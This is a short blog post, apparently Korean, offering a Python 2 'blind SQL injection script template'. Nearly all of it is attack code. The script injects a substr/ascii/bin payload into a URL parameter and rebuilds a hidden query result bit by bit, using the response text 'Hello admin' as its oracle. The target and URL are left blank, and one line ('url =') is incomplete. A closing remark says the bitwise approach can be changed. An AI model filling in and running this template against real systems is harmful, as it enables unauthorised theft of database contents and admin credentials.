Research

blind sql injection script template

Mungsul 2015. 2. 20. 06:56 

#!/usr/bin/python
import urllib2,urllib,time
target = ""
x = 0
answer = ""
while 1:
	x +=1
	ch = 0
	for i in range(1,8):
		url =
		att = "' or id='admin' and substr((select lpad(bin(ascii(substr(("+target+"),"+str(x)+",1))),7,0)),"+str(i)+",1)=1#"
		att = urllib.quote(att)
		url += att
		req = urllib2.Request(url)
		result = urllib2.urlopen(req).read()
		if result.find("Hello admin") > -1:
			ch += 2**(7-i)
		else:
			pass
	if ch == 0:
		break
	else:
		answer += chr(ch)
	print ":) : "+ answer
print "END : ",answer

지금은 bit연산을 이용하는 형태인데 언제든 변경할 수 있음. 유동적으로 사용하는 것이 더 나을것 같다.